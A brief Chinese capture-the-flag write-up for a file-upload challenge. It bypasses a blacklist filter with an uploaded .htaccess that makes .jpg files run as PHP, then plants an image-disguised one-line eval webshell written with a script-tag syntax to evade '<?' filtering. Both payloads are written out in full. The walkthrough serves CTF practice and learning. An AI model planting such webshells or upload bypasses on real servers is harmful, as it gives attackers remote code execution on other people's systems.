文件上传题型。
直接上传一句话木马
可以看出是黑名单过滤, 想到上传.htaccess文件,然后上传图片马,getshell。
key.htaccess文件内容如下:
AddType application/x-httpd-php .jpg
抓包修改文件名上传成功。
接着上传图片马,发现;
猜测过滤<?;修改一句话如下:
<script language = 'php'>eval($_REQUEST[a]); </script>
构造图片马上传成功如下:
蚂蚁连接,得到flag
OK!